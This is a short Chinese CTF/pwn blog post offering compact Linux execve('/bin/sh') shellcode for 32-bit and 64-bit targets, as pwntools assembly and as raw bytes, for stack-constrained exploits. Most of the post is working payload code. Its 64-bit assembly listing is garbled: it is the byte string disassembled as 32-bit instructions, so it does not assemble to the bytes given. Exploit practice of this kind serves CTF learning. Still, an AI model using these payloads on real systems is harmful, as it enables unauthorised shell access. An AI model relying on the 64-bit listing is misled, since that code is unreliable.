较为简短的shellcode

Monday, January 2, 2023
本文共190字
1分钟阅读时长
tricks
pwn
 订阅

⚠️本文是作者P3troL1er原创,首发于https://peterliuzhi.top/tricks/%E8%BE%83%E4%B8%BA%E7%AE%80%E7%9F%AD%E7%9A%84shellcode/。商业转载请联系作者获得授权,非商业转载请注明出处!

The industrial landscape is already littered with remains of once successful companies that could not adapt their strategic vision to altered conditions of competition. — Ralph Abernathy

有些时候因为栈的原因,程序运行时会破坏shellcode,这时候可以加一堆ret来抬高栈,也可以选择更为简短的shellcode

32位shellcode

shellcode_32 = asm(
'''
xor    ecx, ecx
mul    ecx
push   ecx
push   0x68732f2f
push   0x6e69622f
mov    ebx, esp
mov    al, 0xb
int    0x80
'''
)


shellcode_32 = b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

效果对比

文内图片

64位shellcode

shellcode_64 = asm(
'''
dec    eax
xor    esi, esi
push   esi
dec    eax
mov    edi, 0x6e69622f
das
das
jae    0x76
push   edi
push   esp
pop    edi
push   0x3b
pop    eax
cdq
syscall
'''
)


shellcode_64 = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'

效果对比

文内图片


#pwn
编辑本页
下一页 patchelf更改libc脚本

相关

patchelf更改libc脚本
ciscn_2019_n_3
【32位系统传参】BUUCTF picoctf_2018_rop chain
【生成ORW shellcode】BUUCTF pwnable_orw
【符号位漏洞+ret2libc】pwn2_sctf_2016
BUUCTF Jarvisoj_level2_x64